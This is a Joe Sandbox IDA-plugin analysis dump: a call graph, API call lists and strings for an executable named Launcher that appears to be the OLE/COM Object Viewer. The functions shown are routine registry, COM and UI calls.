7330 677b38 lstrcmpiW 7327->7330 7328 677bb8 RegQueryValueW 7331 677c42 RegOpenKeyW 7328->7331 7332 677bdb _wcsnicmp 7328->7332 7329->7331 7330->7329 7335 677b4e lstrcmpiW 7330->7335 7333 677c5e RegCloseKey 7331->7333 7334 677c99 RegOpenKeyW 7331->7334 7332->7331 7336 677bf6 lstrcmpiW 7332->7336 7347 677e65 RegQueryValueW 7333->7347 7339 677cb5 RegCloseKey 7334->7339 7340 677cf0 RegOpenKeyW 7334->7340 7335->7329 7338 677b64 lstrcmpiW 7335->7338 7336->7329 7337 677c0c lstrcmpiW 7336->7337 7337->7329 7341 677c22 lstrcmpiW 7337->7341 7338->7329 7343 677b7a lstrcmpiW 7338->7343 7339->7347 7344 677d47 RegCloseKey RegQueryValueW 7340->7344 7345 677d0c RegCloseKey 7340->7345 7341->7329 7341->7331 7343->7329 7348 677b90 lstrcmpiW 7343->7348 7346 677d87 wsprintfW RegOpenKeyW 7344->7346 7344->7347 7345->7347 7351 677dc3 RegCloseKey 7346->7351 7352 677df8 wsprintfW RegOpenKeyW 7346->7352 7353 677ec7 #861 7347->7353 7354 677ea4 RegQueryValueW 7347->7354 7348->7329 7351->7347 7352->7347 7356 677e34 RegCloseKey 7352->7356 7355 677edf 7353->7355 7354->7353 7354->7355 7357 677ef4 7355->7357 7358 677ee8 RegCloseKey 7355->7358 7356->7347 7357->7319 7358->7357 7371 673e80 7361->7371 7363 673ebb #540 #540 7363->7148 7364->7148 7365->7139 7367 6779d1 RegOpenKeyW 7366->7367 7368 6779fd RegCloseKey 7366->7368 7367->7368 7369 6779e7 RegOpenKeyW 7367->7369 7370 677a0b RegQueryValueW 7368->7370 7369->7368 7369->7370 7370->7327 7370->7328 7371->7363 7372->7167 7373->7182 7374->7206 7430 679137 7375->7430 7377 675049 #540 7378 675067 CoGetClassObject 7377->7378 7379 675088 CoGetClassObject 7377->7379 7380 6750a6 7378->7380 7379->7380 7381 6750c1 7380->7381 7382 6750ac #860 #1262 7380->7382 7383 6750c7 #860 #1262 7381->7383 7384 6750dc 7381->7384 7382->7381 7383->7384 7385 675125 7384->7385 7386 675110 #860 #1262 7384->7386 7387 67512e #860 #1262 7385->7387 7388 675143 7385->7388 7386->7385 7387->7388 7389 6751b3 7388->7389 7390 67519e #860 #1262 7388->7390 7391 6751bc #860 #1262 7389->7391 7392 6751d1 #800 7389->7392 7390->7389 7391->7392 7392->7222 7433 66b3f4 7394->7433 7396 67490a lstrcpyW CreateBindCtx 7397 674948 7396->7397 7398 674957 MkParseDisplayName 7397->7398 7399 67497f 7397->7399 7398->7399 7400 6749a2 #2644 #2810 7399->7400 7401 674a29 lstrlenW 7399->7401 7409 67d91d 17 API calls 7400->7409 7402 674a3e 7401->7402 7403 674a9c #2644 #800 7401->7403 7404 674a58 7402->7404 7434 67f604 7402->7434 7411 674b68 7403->7411 7405 674a5f #2810 7404->7405 7407 67d91d 17 API calls 7405->7407 7407->7403 7410 674a03 #800 7409->7410 7410->7411 7412 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7411->7412 7413 674b7d 7412->7413 7413->7222 7413->7229 7415->7233 7438 67f3e2 7416->7438 7418 67d929 FormatMessageW 7419 67d9b4 #540 7418->7419 7420 67d94c #540 7418->7420 7422 67dceb 2 API calls 7419->7422 7439 67dceb 7420->7439 7424 67d9cb #2810 #922 #858 #800 #1197 7422->7424 7425 67da13 #800 7424->7425 7426 67da1d 7425->7426 7426->7238 7427->7230 7428->7237 7429->7256 7431 67914b CoFreeUnusedLibraries 7430->7431 7431->7377 7433->7396 7437 67f4cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7434->7437 7436 67f6bc 7436->7405 7437->7436 7438->7418 7442 67dcfa 7439->7442 7440 67dcff wsprintfW 7443 67d95f 6 API calls 7440->7443 7442->7440 7444 67dd28 7442->7444 7443->7425 7445 67dd2e wsprintfW 7444->7445 7445->7443 7446->7264 7447->7302 7448->7307 7449->7298 7450->7307 7451 670d60 7452 670d6c __EH_prolog3 7451->7452 7453 67de06 2 API calls 7452->7453 7454 670d76 7453->7454 7455 670d8a 7454->7455 7457 671536 7454->7457 7462 67f3e2 7457->7462 7459 671542 #366 #527 #529 #554 7463 6715a4 #439 7459->7463 7461 67158e 7461->7455 7462->7459 7463->7461 7464 6716c0 #2244 7465 671775 7464->7465 7466 6716ee 7464->7466 7466->7465 7467 67173e #3476 #3476 #5848 #5906 7466->7467 7467->7465 7468 670cc0 #4704 SendMessageW SendMessageW #2634 #2634 7469 6716a0 #4146 7483 66b4f0 7484 66b4fc __EH_prolog3 7483->7484 7527 66b463 GetModuleHandleW 7484->7527 7489 66b552 #6112 7539 66b421 #1172 7489->7539 7490 66b528 #538 7491 67d91d 17 API calls 7490->7491 7493 66b543 #800 7491->7493 7495 66b690 7493->7495 7498 66b576 7500 67de06 2 API calls 7498->7500 7499 66b56f #2613 7499->7498 7501 66b57d 7500->7501 7502 66b597 7501->7502 7503 66b58e #384 7501->7503 7504 66b599 #2089 7502->7504 7503->7504 7505 66b5c7 7504->7505 7506 66b5bb #1197 7504->7506 7507 67de06 2 API calls 7505->7507 7506->7505 7508 66b5ce 7507->7508 7509 66b5f5 7508->7509 7510 66b5dc #520 7508->7510 7511 66b5f7 #986 #4604 7509->7511 7510->7511 7512 66b421 #1172 7511->7512 7513 66b616 7512->7513 7562 66bb96 7513->7562 7516 67d4cd 5 API calls 7517 66b627 7516->7517 7521 66b647 7517->7521 7594 67da20 GetCurrentProcess OpenProcessToken 7517->7594 7520 66b639 #1197 7520->7521 7609 671870 7521->7609 7528 66b497 GetVersionExW 7527->7528 7529 66b472 GetProcAddress 7527->7529 7531 67bd2a 7528->7531 7530 66b485 7529->7530 7530->7528 7532 67d4cd 5 API calls 7531->7532 7533 67bd2f 7532->7533 7534 67bd33 LoadLibraryW 7533->7534 7535 66b51d #1202 7533->7535 7536 67bd42 MessageBoxW exit 7534->7536 7537 67bd5e GetProcAddress 7534->7537 7535->7489 7535->7490 7536->7537 7537->7535 7537->7536 7540 66b42f 7539->7540 7541 66b905 7540->7541 7675 67f415 7541->7675 7543 66b914 #540 #4155 StringFromGUID2 wsprintfW RegQueryValueW 7544 66b992 #540 #540 #538 7543->7544 7545 66b98c 7543->7545 7547 66baa8 LoadLibraryW 7544->7547 7546 66bb81 #800 7545->7546 7548 67f3c4 4 API calls 7546->7548 7549 66babf GetProcAddress 7547->7549 7550 66b9c9 6 API calls 7547->7550 7553 66b566 7548->7553 7554 66bad1 7549->7554 7551 66bb60 #800 #800 #800 7550->7551 7552 66ba2b #355 #2507 7550->7552 7551->7546 7556 66bae3 #800 #641 7552->7556 7557 66ba61 #3494 #858 #800 #800 #641 7552->7557 7553->7498 7553->7499 7555 66bb06 #4155 #4155 #940 #1197 7554->7555 7561 66baff 7554->7561 7558 66bb3d FreeLibrary 7555->7558 7559 66bb44 7556->7559 7557->7547 7558->7559 7559->7551 7560 66bb49 #6398 7559->7560 7560->7551 7561->7558 7676 67f415 7562->7676 7564 66bba5 #540 #4155 7565 66bbd3 StringFromGUID2 wsprintfW RegQueryValueW 7564->7565 7566 66bc50 6 API calls 7564->7566 7565->7566 7567 66bc31 #3516 7565->7567 7568 66bdae LoadLibraryW 7566->7568 7567->7566 7571 66bf5c #800 7567->7571 7569 66bdc5 GetProcAddress 7568->7569 7570 66bcca 6 API calls 7568->7570 7574 66bdd7 7569->7574 7572 66be51 RegOpenKeyExW 7570->7572 7573 66bd2d #355 #2507 7570->7573 7575 67f3c4 4 API calls 7571->7575 7576 66be77 StringFromGUID2 7572->7576 7577 66bf1e 7572->7577 7578 66bd67 #3494 #858 #800 #800 #641 7573->7578 7579 66bde9 #800 #641 7573->7579 7580 66be0b #4155 #4155 #940 #1197 7574->7580 7589 66be05 7574->7589 7581 66b61c 7575->7581 7677 67d81b lstrlenW 7576->7677 7583 66bf22 #6398 7577->7583 7584 66bf39 #800 #800 #800 7577->7584 7578->7568 7579->7572 7585 66be4a FreeLibrary 7580->7585 7581->7516 7583->7584 7584->7571 7585->7572 7587 67d81b 12 API calls 7588 66bec6 StringFromGUID2 7587->7588 7590 67d81b 12 API calls 7588->7590 7589->7585 7591 66beec StringFromGUID2 7590->7591 7592 67d81b 12 API calls 7591->7592 7593 66bf12 RegCloseKey 7592->7593 7593->7577 7595 67da62 malloc 7594->7595 7607 67dad5 7594->7607 7598 67da76 GetTokenInformation 7595->7598 7595->7607 7596 67dae1 FreeSid 7597 67daea 7596->7597 7599 67daf6 7597->7599 7600 67daee free 7597->7600 7601 67da8b AllocateAndInitializeSid 7598->7601 7598->7607 7602 67db05 7599->7602 7603 67dafc CloseHandle 7599->7603 7600->7599 7601->7607 7608 67daac 7601->7608 7604 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7602->7604 7603->7602 7605 66b630 7604->7605 7605->7520 7605->7521 7606 67dab8 EqualSid 7606->7607 7606->7608 7607->7596 7607->7597 7608->7606 7608->7607 7686 67f44b 7609->7686 7611 67187c 8 API calls 7612 671b1e #1258 7611->7612 7613 671908 #2910 7611->7613 7614 671b24 __EH_prolog3_GS 7612->7614 7687 67db5f 7613->7687 7617 671b30 16 API calls 7614->7617 7618 67f3c4 4 API calls 7617->7618 7620 66b66a 7618->7620 7619 67db5f 7 API calls 7621 671941 7619->7621 7647 66b734 7620->7647 7621->7612 7622 67db5f 7 API calls 7621->7622 7623 67195a 7622->7623 7623->7612 7624 67db5f 7 API calls 7623->7624 7625 671973 7624->7625 7625->7612 7626 67db5f 7 API calls 7625->7626 7627 67198c 7626->7627 7627->7612 7628 67db5f 7 API calls 7627->7628 7629 6719a5 7628->7629 7629->7612 7630 67db5f 7 API calls 7629->7630 7631 6719be 7630->7631 7631->7612 7632 67db5f 7 API calls 7631->7632 7633 6719d7 7632->7633 7633->7612 7634 67db5f 7 API calls 7633->7634 7635 6719f0 7634->7635 7635->7612 7636 67db5f 7 API calls 7635->7636 7637 671a09 7636->7637 7637->7612 7638 67db5f 7 API calls 7637->7638 7639 671a22 7638->7639 7639->7612 7640 67db5f 7 API calls 7639->7640 7641 671a3c 7640->7641 7641->7612 7642 671a49 7 API calls 7641->7642 7644 671b16 7642->7644 7702 67f3d3 7644->7702 7648 66b740 __EH_prolog3_GS 7647->7648 7649 66b8b0 7648->7649 7650 66b76e #538 7648->7650 7652 67f3c4 4 API calls 7649->7652 7651 674899 33 API calls 7650->7651 7653 66b790 #800 7651->7653 7654 66b671 #5977 7652->7654 7655 66b7e4 7653->7655 7656 66b7a5 #538 7653->7656 7654->7495 7655->7649 7658 66b7ec CLSIDFromProgID 7655->7658 7657 66b7b5 7656->7657 7705 6742eb #1662 7657->7705 7660 66b7fb CoCreateInstance 7658->7660 7661 66b879 7658->7661 7670 66b847 #540 #2810 7660->7670 7671 66b830 #538 7660->7671 7662 66b896 7661->7662 7663 66b882 LoadTypeLib 7661->7663 7665 66b89f 7662->7665 7666 66b8c8 #540 #2810 7662->7666 7663->7662 7736 671c95 7665->7736 7668 67d91d 17 API calls 7666->7668 7672 66b874 #800 7668->7672 7673 67d91d 17 API calls 7670->7673 7671->7657 7672->7649 7673->7672 7675->7543 7676->7564 7678 67d853 7677->7678 7679 67d85d RegCreateKeyExW 7677->7679 7683 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7678->7683 7679->7678 7680 67d891 lstrcpyW lstrlenW 7679->7680 7681 67d8b1 lstrlenW 7680->7681 7682 67d8ca lstrlenW 7680->7682 7684 67d8e1 RegSetValueExW RegCloseKey 7681->7684 7682->7684 7685 66bea0 StringFromGUID2 7683->7685 7684->7678 7685->7587 7686->7611 7688 67db78 isspace 7687->7688 7689 67db87 7688->7689 7690 67db75 7688->7690 7691 671925 7689->7691 7692 67dc03 isdigit 7689->7692 7700 67dbc1 isxdigit 7689->7700 7690->7688 7691->7612 7691->7619 7694 67dc01 isspace 7692->7694 7698 67dc39 7694->7698 7696 67dbc6 isdigit 7699 67dbe2 toupper 7696->7699 7696->7700 7698->7691 7701 67dc42 isspace 7698->7701 7699->7700 7700->7694 7700->7696 7701->7691 7701->7701 7703 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7702->7703 7704 67f3dd 7703->7704 7704->7704 7706 674369 7705->7706 7707 66b3d0 2 API calls 7706->7707 7708 674478 7707->7708 7709 674496 #858 7708->7709 7710 673e89 2 API calls 7708->7710 7712 674553 #540 7709->7712 7710->7709 7714 67457c 7712->7714 7715 674587 StringFromGUID2 7714->7715 7716 674640 #2810 7714->7716 7764 66b696 7715->7764 7717 674659 7716->7717 7766 674794 7717->7766 7719 6745ac lstrcpyW 7720 677a11 41 API calls 7719->7720 7722 6745c6 #2810 lstrcpyW 7720->7722 7765 66b3f4 7722->7765 7725 674612 RegQueryValueW #2810 7725->7717 7726 674731 #2644 7727 674745 #800 7726->7727 7730 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7727->7730 7728 679137 CoFreeUnusedLibraries 7735 674689 #540 #2810 7728->7735 7732 66b7ca #800 7730->7732 7732->7649 7733 67d91d 17 API calls 7734 674722 #800 7733->7734 7734->7726 7735->7733 7783 67f415 7736->7783 7738 671ca4 StringFromGUID2 wsprintfW RegQueryValueW 7739 671d36 7738->7739 7740 671d24 lstrcpyW 7738->7740 7744 671e58 7739->7744 7784 671c2f 7739->7784 7740->7739 7742 671ed8 CoCreateInstance 7747 671e8a #540 7742->7747 7759 671efa 7742->7759 7744->7742 7745 671df8 CLSIDFromString 7745->7744 7751 671e12 #540 #2810 7745->7751 7746 671da8 7750 671c2f _vsnwprintf 7746->7750 7748 671ea3 7747->7748 7749 671eaf #2859 7747->7749 7748->7749 7752 671f7e #2810 7748->7752 7753 66bb96 57 API calls 7749->7753 7754 671dc2 RegQueryValueW 7750->7754 7755 67d91d 17 API calls 7751->7755 7757 67d91d 17 API calls 7752->7757 7758 671ec1 7753->7758 7754->7744 7754->7745 7756 671e48 #800 7755->7756 7756->7759 7760 671fa6 7757->7760 7758->7760 7761 671ec9 #800 7758->7761 7762 67f3c4 4 API calls 7759->7762 7761->7742 7763 671f7b 7762->7763 7763->7649 7764->7719 7765->7725 7767 6747f4 7766->7767 7768 6747ba 7766->7768 7779 677f0b SendMessageW 7767->7779 7778 677f0b SendMessageW 7768->7778 7771 674852 7780 6755e4 SendMessageW 7771->7780 7773 674869 7781 6755e4 SendMessageW 7773->7781 7775 674880 7782 6791e9 SendMessageW 7775->7782 7777 674676 7777->7726 7777->7728 7778->7767 7779->7771 7780->7773 7781->7775 7782->7777 7783->7738 7785 671c3e 7784->7785 7786 671c4e _vsnwprintf 7785->7786 7787 671c6d RegQueryValueW 7785->7787 7786->7787 7787->7745 7787->7746 7788 66da30 8 API calls 7793 66c8a6 ScreenToClient ScreenToClient #3133 7788->7793 7791 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7792 66db96 7791->7792 7794 66c8d8 7 API calls 7793->7794 7794->7791 7795 66eab0 7796 66eabc __EH_prolog3 7795->7796 7797 67de06 2 API calls 7796->7797 7798 66eac3 7797->7798 7799 66ead7 7798->7799 7801 66eae6 7798->7801 7805 67f3e2 7801->7805 7803 66eaf2 14 API calls 7804 66ebcb 7803->7804 7804->7799 7805->7803 7806 677ff0 7807 678036 7806->7807 7855 679205 7807->7855 7809 67803d #1662 7810 67808e 7809->7810 7858 66e18b SendMessageW 7810->7858 7812 678095 CoCreateInstance 7813 6780ba 7812->7813 7815 67642d 57 API calls 7813->7815 7818 678137 7813->7818 7814 6783f4 7816 678403 7814->7816 7817 678422 7814->7817 7815->7818 7872 6778da SendMessageW 7816->7872 7874 66e18b SendMessageW 7817->7874 7818->7814 7859 677f0b SendMessageW 7818->7859 7821 67816c 7824 66b3d0 2 API calls 7821->7824 7823 678433 #2644 7826 67819a 7824->7826 7825 678412 7873 6791e9 SendMessageW 7825->7873 7827 673e89 2 API calls 7826->7827 7829 6781af 7826->7829 7827->7829 7860 677f0b SendMessageW 7829->7860 7831 6781eb 7861 6755e4 SendMessageW 7831->7861 7833 6782a6 7862 677f0b SendMessageW 7833->7862 7834 67820c 7834->7833 7867 677f0b SendMessageW 7834->7867 7837 6782d4 7863 677f0b SendMessageW 7837->7863 7838 67824a 7868 677f0b SendMessageW 7838->7868 7841 678278 7869 677f0b SendMessageW 7841->7869 7842 678359 7844 67db15 3 API calls 7842->7844 7850 67835e 7844->7850 7845 6782fc 7846 678333 7845->7846 7870 677f0b SendMessageW 7845->7870 7846->7842 7864 6755e4 SendMessageW 7846->7864 7849 678391 7865 677f0b SendMessageW 7849->7865 7850->7849 7871 677f0b SendMessageW 7850->7871 7853 6783c6 7866 677f0b SendMessageW 7853->7866 7856 679214 SendMessageW #2857 7855->7856 7857 679211 7855->7857 7856->7809 7857->7856 7858->7812 7859->7821 7860->7831 7861->7834 7862->7837 7863->7845 7864->7842 7865->7853 7866->7814 7867->7838 7868->7841 7869->7833 7870->7846 7871->7849 7872->7825 7873->7817 7874->7823 7875 67edf0 __wgetmainargs 7876 672870 7877 672888 7876->7877 7886 6778ed GetFocus #2859 7877->7886 7879 672896 7880 6728a1 7879->7880 7881 6728ff 7879->7881 7887 677980 SendMessageW 7880->7887 7883 6728b0 7883->7881 7888 6778fa SendMessageW 7883->7888 7885 6728d3 7885->7881 7886->7879 7887->7883 7888->7885 7889 6795d0 #4704 7890 66b421 #1172 7889->7890 7891 6795df 7890->7891 7895 679597 SendMessageW #2855 7891->7895 7893 6795ea SendMessageW 7895->7893 7896 672050 7897 66b3d0 2 API calls 7896->7897 7898 672081 7897->7898 7899 672096 7898->7899 7901 673d3b 7898->7901 7913 673f53 #303 7901->7913 7903 673d6d #540 7904 66b3d0 2 API calls 7903->7904 7905 673de4 7904->7905 7906 673df9 7905->7906 7914 673cfc #543 InitializeCriticalSection 7905->7914 7908 66b3d0 2 API calls 7906->7908 7909 673e1b 7908->7909 7912 673e30 #1105 7909->7912 7915 673cfc #543 InitializeCriticalSection 7909->7915 7912->7899 7913->7903 7914->7906 7915->7912 7916 672eb0 7917 67db15 3 API calls 7916->7917 7918 672ebf 7917->7918 7920 672ece 7918->7920 7921 672940 7918->7921 7922 672958 7921->7922 7931 6778ed GetFocus #2859 7922->7931 7924 672966 7925 6729d5 7924->7925 7926 672971 7924->7926 7925->7920 7932 677980 SendMessageW 7926->7932 7928 672980 7928->7925 7933 6778fa SendMessageW 7928->7933 7930 6729a3 7930->7925 7931->7924 7932->7928 7933->7930 7934 670d90 #5491 #4451 7935 670e60 7934->7935 7936 670dbb #2112 7934->7936 7936->7935 7937 670ddb #4158 7936->7937 7937->7935 7938 670de8 #5867 #2109 7937->7938 7938->7935 7939 670e15 #5996 7938->7939 7939->7935 7940 670e27 #3477 #6063 #2550 7939->7940 7940->7935

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0066B90F
                                                                                                    • #540.MFC42U(000005AC,0066B566,00000000,00000011), ref: 0066B91D
                                                                                                    • #4155.MFC42U(00000004,000005AC,0066B566,00000000,00000011), ref: 0066B92F
                                                                                                    • StringFromGUID2.OLE32(006636E4,?), ref: 0066B949
                                                                                                    • wsprintfW.USER32 ref: 0066B95F
                                                                                                    • RegQueryValueW.ADVAPI32(80000000,?,?,?), ref: 0066B982
                                                                                                    • #540.MFC42U ref: 0066B998
                                                                                                    • #540.MFC42U ref: 0066B9A7
                                                                                                    • #538.MFC42U(Comcat.DLL), ref: 0066B9BB
                                                                                                    • LoadLibraryW.KERNEL32(?,Comcat.DLL), ref: 0066BAAE
                                                                                                    • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 0066BAC5
                                                                                                    • #4155.MFC42U(00000019), ref: 0066BB0C
                                                                                                    • #4155.MFC42U(00000018,00000019), ref: 0066BB19
                                                                                                    • #940.MFC42U(?,00000018,00000019), ref: 0066BB2B
                                                                                                    • #1197.MFC42U(?,00000000,00000000,?,00000018,00000019), ref: 0066BB38
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000000,?,00000018,00000019), ref: 0066BB3E
                                                                                                    • #6398.MFC42U(?,Version,0000003D,00000001,comcat.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,0000001A,?,00000018), ref: 0066BB5B
                                                                                                    • #800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 0066BB66
                                                                                                    • #800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 0066BB71
                                                                                                    • #800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 0066BB7C
                                                                                                    • #800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 0066BB87
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#4155#540$Library$#1197#538#6398#940AddressFreeFromH_prolog3_LoadProcQueryStringValuewsprintf
                                                                                                    • String ID: CLSID\%s$Comcat.DLL$DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|$DllRegisterServer$Version$comcat.dll
                                                                                                    • API String ID: 446370969-4202070818
                                                                                                    • Opcode ID: 7b8ba33c2e90128dcbc8e59937f4f5fcbbab56355941407e2681070d2814c6b7
                                                                                                    • Instruction ID: 6566e7a3b8db5a1c52619aa59536a88bc8418c6ac6a8e6eda8ec1135d0c95a19
                                                                                                    • Opcode Fuzzy Hash: 7b8ba33c2e90128dcbc8e59937f4f5fcbbab56355941407e2681070d2814c6b7
                                                                                                    • Instruction Fuzzy Hash: 9F515F30A41628AECB61EB50CC95BEE7736AF25301F4045DCF24AA6091EF705F89CF16

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0066B4F7
                                                                                                      • Part of subcall function 0066B463: GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 0066B468
                                                                                                      • Part of subcall function 0066B463: GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 0066B479
                                                                                                    • GetVersionExW.KERNEL32(006837B0,00000004), ref: 0066B512
                                                                                                      • Part of subcall function 0067BD2A: LoadLibraryW.KERNEL32(ACLUI.DLL,0066B51D), ref: 0067BD38
                                                                                                      • Part of subcall function 0067BD2A: MessageBoxW.USER32(00000000,Couldn't get address of EditSecurity ACLUI.DLL!,OLEViewer,00000000), ref: 0067BD50
                                                                                                      • Part of subcall function 0067BD2A: exit.MSVCRT ref: 0067BD58
                                                                                                      • Part of subcall function 0067BD2A: GetProcAddress.KERNEL32(00000000,EditSecurity), ref: 0067BD64
                                                                                                    • #1202.MFC42U ref: 0066B51D
                                                                                                    • #538.MFC42U(OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.), ref: 0066B530
                                                                                                      • Part of subcall function 0067D91D: __EH_prolog3.LIBCMT ref: 0067D924
                                                                                                      • Part of subcall function 0067D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,0067B9B7,?,00000000,00000000,00000000), ref: 0067D942
                                                                                                      • Part of subcall function 0067D91D: #540.MFC42U ref: 0067D94F
                                                                                                      • Part of subcall function 0067D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 0067D96C
                                                                                                      • Part of subcall function 0067D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 0067D97F
                                                                                                      • Part of subcall function 0067D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0067D98C
                                                                                                      • Part of subcall function 0067D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0067D997
                                                                                                      • Part of subcall function 0067D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0067D99F
                                                                                                      • Part of subcall function 0067D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 0067D9AA
                                                                                                      • Part of subcall function 0067D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0067DA13
                                                                                                    • #800.MFC42U(?,00000000,OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.), ref: 0066B546
                                                                                                    • #6112.MFC42U(00000011), ref: 0066B556
                                                                                                    • #2613.MFC42U(00000000,00000011), ref: 0066B571
                                                                                                    • #384.MFC42U(00000000,00000011), ref: 0066B590
                                                                                                    • #2089.MFC42U(000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 0066B5B2
                                                                                                    • #1197.MFC42U(Could not load bitmaps,00000000,00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 0066B5C2
                                                                                                    • #520.MFC42U(00000002,00663458,Df, Jf,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 0066B5EE
                                                                                                    • #986.MFC42U(00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 0066B5FE
                                                                                                    • #4604.MFC42U(00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 0066B60B
                                                                                                    • #1197.MFC42U(Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.,00000000,00000000,00000000,00000000,00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 0066B640
                                                                                                    • #5977.MFC42U ref: 0066B688
                                                                                                    Strings
                                                                                                    • OleInitialize failed. Could not initialized OLE; OLEViewer cannot run., xrefs: 0066B528
                                                                                                    • Could not load bitmaps, xrefs: 0066B5BD
                                                                                                    • Df, xrefs: 0066B5E1
                                                                                                    • Jf, xrefs: 0066B5DC
                                                                                                    • Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator., xrefs: 0066B63B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #1197#800$AddressH_prolog3MessageProc$#1202#2089#2613#2810#384#4604#520#538#540#5977#6112#858#922#986FormatFreeHandleLibraryLoadLocalModuleVersionexit
                                                                                                    • String ID: Jf$Could not load bitmaps$OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.$Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.$Df
                                                                                                    • API String ID: 800470354-4139715274
                                                                                                    • Opcode ID: 1c522ae789b9549c4c0eecafec6b63c1bbca6c856b405939565fbaf98055a480
                                                                                                    • Instruction ID: e1ae17546ef712a2c613a0d4c0519efae6f7f017722c67bd483a049b81b0cdef
                                                                                                    • Opcode Fuzzy Hash: 1c522ae789b9549c4c0eecafec6b63c1bbca6c856b405939565fbaf98055a480
                                                                                                    • Instruction Fuzzy Hash: 584123B0B00211EBDB94BBB08C46A7E62ABAF44310F00996DF506EB3D2DFB1CD448748

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 404 67642d-6764d6 CoCreateInstance 405 6764dc-676527 GetUserDefaultLCID 404->405 406 676738-676758 RegOpenKeyW 404->406 420 67652d-676535 405->420 421 67670a-676733 405->421 407 676923-676939 call 67f3a0 406->407 408 67675e-676791 RegEnumKeyW 406->408 412 676917-67691d RegCloseKey 408->412 413 676797-6767b3 RegOpenKeyW 408->413 412->407 415 676912 413->415 416 6767b9-6767e8 RegQueryValueExW 413->416 418 676906-67690c RegCloseKey 416->418 419 6767ee-6767fe 416->419 418->415 422 676800-676819 wsprintfW 419->422 423 67681c-67683a call 66b3d0 419->423 424 67653d-676573 420->424 421->407 422->423 429 67684f 423->429 430 67683c-67684d call 673e89 423->430 436 6766e1-676704 424->436 437 676579-67659f StringFromGUID2 424->437 434 676856-676893 call 677a11 429->434 430->434 442 676895-67689b 434->442 443 6768a2-676901 call 6779ae call 677f0b 434->443 436->421 440 6765b5-6765d7 wsprintfW 437->440 441 6765a1-6765b3 call 66b696 437->441 444 6765dd-6765f0 440->444 441->444 442->443 443->418 449 676603-67661e call 66b3d0 444->449 450 6765f2-6765fc 444->450 456 676633 449->456 457 676620-676631 call 673e89 449->457 450->449 452 6765fe 450->452 452->424 459 67663a-676669 call 66b696 call 677a11 456->459 457->459 464 67666e-676670 459->464 465 676672-676678 464->465 466 67667f-6766dc call 6779ae call 677f0b 464->466 465->466 466->424
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(006636E4,00000000,00000001,006636F4,00000000), ref: 006764C3
                                                                                                    • GetUserDefaultLCID.KERNEL32(00000000), ref: 006764EA
